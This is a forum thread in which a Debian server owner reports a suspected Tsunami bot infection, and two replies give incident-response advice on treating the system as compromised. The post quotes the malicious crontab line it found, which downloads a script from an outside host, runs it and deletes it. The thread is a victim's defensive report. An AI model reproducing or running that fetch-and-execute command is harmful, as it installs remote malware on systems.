suspected victim of Tsunami exploit

Regards,

since my server acted "weird" lately (pulling high bandwidth during my nighttimes in spikes, then automatically stopping for the past few days) I inspected the server and found a crontab which pulled regular.bot from stablehost.us

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

A quick Google search led me to the following CentOS (I'm running Debian) forum page:

https://www.centos.org/forums/viewtopic.php?f=17&t=48804

Looking through my device in /tmp there are no scripts which shouldn't belong as far as I can see:

root@ragnarok:/tmp# ls -alh
total 24K
drwxrwxrwt  6 root root    4.0K Jan  4 13:45 .
drwxr-xr-x 24 root root    4.0K Jan  4 05:14 ..
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .ICE-unix
drwxrwxrwt  2 root root    4.0K Dec 23 23:39 .X11-unix
-rw-r--r--  1 root root       0 Jan  4 13:16 .sh
drwxr-xr-x  2 root root    4.0K Dec 23 23:39 .webmin

Anyone able to provide more info with a means to make sure the system is clean?

I know the best course of action would be to scrap the server and start over. This is scheduled but I currently don't yet have the time for it so if I could make sure it's not a threat at this minute, I could build the new machine on the scheduled time.

Regards,

2 Replies

The crontab runs the script and then deletes it, which is why you don't see a file in /tmp. While the script is running, Linux keeps the file in memory even though it doesn't have a name any longer.

I haven't looked at this particular script to see if it uses any other tricks to hide itself, but you need to consider the entire system as being compromised - what are the chances that only one malicious actor found an exploit?

Without knowing how your attacker first compromised your system, it's difficult to determine if your system is clean.

Search all your logs, command histories, etc. Search for all new files on your server and examine them to make sure they are not backdoors.

